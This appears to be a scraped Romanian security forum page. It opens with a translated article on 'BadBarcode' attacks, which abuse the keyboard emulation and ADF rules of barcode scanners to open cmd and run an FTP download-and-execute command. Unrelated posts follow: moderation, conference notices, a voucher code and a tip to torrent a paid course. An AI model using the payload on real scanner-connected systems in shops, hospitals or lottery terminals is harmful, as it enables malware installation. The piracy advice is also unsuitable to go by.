M2G

Barcode attack technique (Badbarcode) - Drops virustracker Author:数据流@伏宸安全实验室 From:http://drops.wooyun.org/tips/12183 Barcode is everywhere in our daily life, especially in supermarkets, convenience stores and logistics industry. However, is it safe? The barcode attack that @Tk described on PacSec and included in his demo video on twitter are so cool that I bought a scanner for research as well. During my research, I went through all information whether it is at home or abroad, but none covers the possible attack techniques. So here is one. Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines constituted by black bars (abbreviated as bar) and white bars (abbreviated as space) that are with different reflectivity. Here are several common types of barcode: code39, code128, code93, EAN128, EAN13 QR , etc. Most of them are one-dimensional, except for QR which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the one that is most widely used and supports most characters. Normally such attacks will exploit code 128 barcodes. Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery office. A scanner is used to read the information of a barcode. A conventional one often uses infrared ray to do that and its embedded chip outputs the result through processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Amongst Symbol has been acquired by Motorola. You’ll notice that when you pay the bill at the supermarket, the code of goods is displayed on the screen after scanning. Actually many scanners rely on keyboard for input, which means a scanner, in fact, is the equivalent of a keyboard. This is a huge risk. Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes. But, for example, UPC barcode only supports numbers and some may support numbers and letters, while code 128 is widely used because it supports ASCII 0-127 characters and that’s why it is called code 128. Barcode length is adjustable, which may support up to 232 characters. Code 128 can be categorized into 3 groups: Code 128A: Standard numbers and uppercase letters, control characters, special characters Code 128B: Standard numbers and uppercase letters, lowercase letters, special characters Code 128C/EAN 128: number pair collections from [00] to [99], a total of 100, i.e., can only represent digital length of even numbers. Code 128 consists of 4 parts: start code, data code, check code (optional) and end code. As shown above, the barcode has different widths and spacings of parallel lines and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar contains of two units of vertical lines, while the second space contains of one unit of vertical line, so on and so forth. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code. Comparison between start codes: 128A 11010000100 128B 11010010000 128C 11010011100 All end code is always 1100011101011. According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode. In the end, the barcode data can be obtained through analysis based on the encoding table for code128. According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters. Based on the control characters table of ASCII, almost all Ctrl+? Key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used only in certain applications, for example, in a Browser and MS Word. Some of the control characters can be used in some terminals making the program jump out of the sandbox. How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it’s time to write your program. There are also many small programs that can generate barcodes on the Internet. Here I recommend a powerful barcode editor: BarTender. After installation, click “file”-“new”-“finish” and there is a blank template. Then click the barcode button to create your barcode and select code 128. Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs “FutureSec” and outputs Ctrl+O. After scanning, the scanner pops up a dialog box immediately. Almost every scanner can execute it, because code 128 is supported by many scanners. Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners according to the rules you set for each step to customize input data, which can also be viewed as a barcode technique that supports programming. For instance, within a check out system, when you scan a commodity, since check out system is not able to directly process the barcode, this technique is required. Check system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers, in order to be identified by the check out system, it has to be processed before input. Here is another example: Barcode data: 8523647122 Output data from ADF: 8523641 How to implement ADF? There are not any Chinese materials about ADF on the Internet. And only a few appears on some English websites. However, you’ll also be confused by @TK’s introduction about ADF in his PPT because of the lack of details. Later, I found a 300-page ADF guide from Motorola. ADF is a programming method which you may construct based on your need and it uses barcode instead of code for programming. ADF represents all rules by using barcode, such as Prefix/Suffix, Replacement and Character Input. Use ADF to hijack data of a scanner Before set up ADF setting for the scanner, scan the start mode first. Begin new rule. Then the scanned barcode will be added with a rule so long as the logic of the rule is legal. Next scan the following barcodes in order Then save the rule When saving the rule, all output data of the scanner will be hijacked as “TEST”. If you set ADF, your rule will be executed step by step. How to recover it? Clear all barcodes with rule. Since a command will be executed by solely using control characters and ADF supports simple programming and more keys, then system commands can be easily executed by using ADF. ADF supports more keys, for example, the most useful WIN+R. It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed by using the above rule. But this is not enough, because the input is completed by system which is faster than human input. When you reach GUI R and execute “c”, ”m”, “d”, cmd is already entered before the dialog box for win+r pops up. Therefore, time delay is required. And ADF supports it, which equals to sleep() in programming. When inputing the ADF rule, two Numeric are entered as the scanning delay, such as, 0 and 1 which represent a delay of 0.1s; 0 and 5 equal to 0.5, the default values is 1 second. If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands that mainly include Enter. But if you do it as described above, it even requires 10 barcodes to pop a cmd box, which means the scanner has to repeat scanning for 10 times. Here is a demo from Tencent Xuan Wu Lab: https://twitter.com/tombkeeper/status/663730674017300480 In the video, we used a pile of barcodes and scanned them for 10 times in sequence to get a cmd. This probably relates to the model of the scanner. If it’s like this, whether rule generation or exploitation will be troublesome. As a matter of fact, this can be optimized to combine the rules of ADF by using the scanner software-123scan from Motorola. 123scan is a very powerful scanner management software by Motorola available at its official website. This software supports multiple functions. Next part is about how to use 123scan to set up ADF. Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”. Click on Add action to add a rule. All ADF rules are included, including Beep control (control the buzzer for the scanner), Replace, etc. Set a 0.5s delay and add rules in order. Finally, all barcodes will be combined automatically and output. The above is the barcode payload used to execute arbitrary commands. Except the first to set factory settings and the second to clear all rules, it only requires 4 barcodes to execute any single commands. “Send All that remains” represents the original data of barcodes after setting the ADF. Here os the ADF process for the above 4 barcodes: input WIN+R->delay 0.5s->input c->input m->input d->input Carriage Return->delay 0.5s->execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it’s single line command, 4 barcodes will be enough and Send ALL that remains will not be required. Use ADF to plant malware Since cmd commands are to execute, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands. ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR» The next is our demo video that has scanned ADF settings for 4 times. Whatever the barcode executes to Send All that remains. The video shows how to use FTP commands to execute. (Tested model: Symbol-LS4208-SR20001ZZR) http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2 Password: wooyun520 Next is a summary of the possible attack scenarios: 1.Pay a bill Use barcode to replace commodities; Many convenience store supports WeChat, Ali Pay Barcode. The scanner supports multiple types of barcodes and it can scan the barcodes saved in the cell phone. Some markets equip with price query terminals. Use the terminal to scan a special barcode, you’ll be able to jump out of the terminal. 2.Hospital records, testing list Nowadays, the register at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode or you may hand it to a nurse. Almost every hospital has such terminals that can generate testing list by scanning the barcode. 3.Lottery ticket Lottery tickets have barcodes. The inspecting machine requires the barcode to identify this ticket. So it’s possible to forge or attack an inspecting machine, there are many types of lottery terminals. 4.Express list Express lists also use barcode, normally the barcode can be code 128 or code 39. Some self-help pickup cabinets may be risky. There are many other scenarios that I won’t list here. If it’s possible, I’ll find another chance to analyze each scenario. Disable ADF function of the scanner by default. Avoid using keyboard simulation of the scanner. Set up hotkey blacklist. The concept of using barcode to launch attack is raised years ago, but no one digs deep. By using SQL barcode, it’s able to launch SQL injection, XSS and overflow attack. Whatever the device is, once part of the input can be manipulated, it is risky. http://www.appsbarcode.com/code%20128.php http://www.slideshare.net/mobile/PacSecJP/hyperchem-ma-badbarcode-en1109nocommentfinal Sursa

Este disponibil chiar in headerul fiecarui post. MrGrj | Posted 1 minute ago · Report post

Oricum nu se mai acorda VIP momentan asa ca nu are rost sa mai continuam aici. Closed.

Bine ai venit! Ai o atitudine buna. Poti sa dai mai multe informatii despre tine? Ce speri sa gasesti aici si care e motivul pentru care te-ai inregistrat? Ce cunostiinte ai in domeniul IT (daca se aplica)?

Va rog sa nu incepeti cu telenovelele. Tema nu e singurul lucru pe care l-am schimbat la forum. O sa incercam sa-l tinem mai curat asa ca incetati cu flame-ul si offtopicul. Exemplu: @AGSQ, @ManutaDeAur, @Kronzy si @Meteosensibilul Ati fost cam offtopic in ultimele raspunsuri. Sistemul de report e foarte fain aici asa ca daca cineva "sare gardu" folositi-l cu incredere in loc sa raspundeti in thread si sa stricati topicul original. #numazic

Trebuie doar sa faci hover cu mouse-ul peste username si apare si registration date.

Daca vrei ceva material video iti recomand sa incepi cu asta: https://www.pluralsight.com/courses/hack-yourself-first Acopera o parte dintre cele mai mari vulnerabilitati web si iti arata cum poti sa le exploatezi. Tipul explica bine, m-a uitat si eu in trecut la cateva. Poti sa descarci si fisierele de exercitii si sa te joci tu cu site-ul local. Cred ca il gasesti pe torente. In cazul in care nu-l gasesti anunta-ma si o sa ti-l trimit eu. Pont: Poti sa te inscrii la conferinta: https://hacksummit.org/ O sa primesti pe mail un link care te lasa sa iti faci cont trial pe pluralsight pentru 2 luni. Astfel poti sa descarci materialele de acolo si sa te uiti la tutoriale fara restrictii.

Nu cred ca are rost sa incerci dubiosenii de genu ala Basic4Android. Probabil o sa ai probleme si gasesti putin suport pentru asta. Recomandat este sa mergi native: Java+Android SDK Urmatoarea alternativa ar fi Xamarin studio: https://developer.xamarin.com/guides/cross-platform/application_fundamentals/pcl/ Xamarin suporta C# dar din cate am citit am vazut ca ai putea sa scrii si VB.

Stiri de ultima ora, stiri online | Stirileprotv.ro @wildchild Cand a mers Zatarra sa scoata banii din bancomat era unu in fata lui care tot incerca sa puna puncte si slashuri in interfata bancomatului. Dupa 5 minute a renuntat. Aia credeau ca acolo e vulnerabilitatea. Dupa, a urmat Zatarra, a scanat cardul, a bagat pinul si a introdus sa retraga 20 de lei. A aparut mesajul "...You have hacked the bank..." - ceva de genu. Unu din spate a ramas suprins si zicea ceva de genu "ui la asta ca a bagat 20 la suma si a spart. Cum a facut? Ce a facut?" A reusit in 20 sec pe cand ceilalti se chinuiau sa bage caractere ciudate in interfata bancomatului.

Intrebare primita pe mail de unu din colegii mei de la client:

Cand am vazut ca e pe twitch ma gandeam ca ramane inregistrat. Nu ati inregistrat cereva sa-mi trimiteti un link?

Feynman + montajul e frumos facut.

Pentru ca e un event la care vreau sa particip si de asta am dat like. Omul a zis "Like this post if you will join". I-am scris lui, nu tie. As vrea sa particip dar e posibil sa nu pot si nu am cum sa stiu asta in momentul asta pentru ca nu depinde numai de mine. Partea cu "Like this post" a zis-o sa stie cati sunt interesati ca sa vada daca are rost sa tina prezentarea. Daca eu am dat like si nu pot sa fiu online la acea ora, am vrut sa stie motivul. Asa e frumos. P.S. https://rstforums.com/forum/83838-abuzuri-de-putere-reclamatii-68.rst#post660540 https://rstforums.com/forum/105404-europa-ip-uri-nologine-busybox-post655161.rst#post655161 https://rstforums.com/forum/105457-dctf-gat-ixsesed-adik-haneipot-crd-sau-sa-se-scuze-ie-honeipot.rst#post655293 etc.. Ai 7 posturi din care 6 sunt total pe langa subiect si neinteresante. Asta inseamna ca aproximativ 90% din posturile tale sunt de cacat.

Nu stiu daca ajung acasa pana la ora aceea dar intru daca ajung.

Am vazut tabelul aici si nu stiam daca se refera la salariul net sau brut. Am dat click pe articol si am vazut ca nici acolo nu da mai multe detalii. Am observat ca exista cateva asterisk-uri in tabel si nu vedeam unde sunt referite informatiile. Am cautat unpic si am gasit sursa: http://www.brainspotting.ro/wp-content/uploads/2015/10/Brainspotting_ITC_Talentmap_2015-2016.pdf Ma uimeste cum jurnalistii pot sa scrie un articol doar cand se uita la 2 poze si un tabel. E mult spus articol, ca are 4 paragrafe . Macar au scris numele companiei care a facut studiul, ca altfel nu aveam cum sa ajung la sursa. PS In tabel este reprezentat salariul net.

Am fost la conferinta cand a prezentat live. Mi sa parut un talk foarte bun, mai ales ca tipa are si skilluri de public speaking si nu te plictiseste cand vorbeste. Sursa

OWASP Cluj nu mai are rost, e sold out.

24th - 25th of November 2015 Cluj-NapocaCluj IT Days: Innovation, entrepreneurship and technologies Location: Cluj Arena Conference & Multifunctional hall IT Days Schedule este pus pe site. Or sa fie si workshopuri interesante. Bonus: 25% reducere din pretul biletului cu cuponul: 2015_ITDAYS (valabil pana la 1 octombrie)

Internet & Mobile World 2015 7-8 Octombrie, Bucuresti The world as we know it is being shaped by digital as we speak. Its architects are now visionaries, thought leaders and entrepreneurs. They design how all our experiences will look like in the future by coming up with new ideas and technologies. Join them at IMWorld 2015 and start shaping the digital future together. 4 CONTENT STAGES Main Stage Business Software & Infrastructure Developers Digital Marketing & E-commerce 5 NETWORKING AREAS Innovation & Gadgets Area & 4 additional thematic networking points 4 EXPO AREAS Business Software & Infrastructure Online Marketing & E-commerce International Institutions Start-ups

How to Web Conference 2015 26-27 Noiembrie, Bucuresti Este o conferinta despre antreprenoriat, tehnologie, investitii, produse etc. Nu o sa merg, dar postez asta sa se simta bine @Zatarra ca are threaduri in rubrica asta.

Am primit pe mail un voucher de la eMAG in valoare de 20 lei. Este valabil pana in data de 30 septembrie pentru cumparaturi cu valoare de minim 200 RON si se cumuleaza cu alte reduceri. Presupun ca poate sa il foloseasca oricine si nu e ceva generat doar pentru contul meu. 3236-3254-0619-0644 Regulament aici

Ai nevoie de vase speciale pentru plitele cu inductie. Cel mai probabil asta e problema. Daca o pornesti si nu ai un vas pe ea se opreste automat. Cauta pe net vase pentru plita cu inductie daca vrei sa o folosesti.(sunt destul de scumpe)

Pentru ca cu cat stii mai multe si ai orizonturile mai larg deschise iti dai seama cat de putin stii defapt si ca pana in momentul respectiv nu ai fost super-inteligent ci doar ignorant.

Am o cana cu vin de afine langa mine. Sunt prea zen sa dau ban. Noi daca suntem programatori, reparam bugu. Tu daca esti sysadmin, ai scos componenta defecta. Ce nu e ok?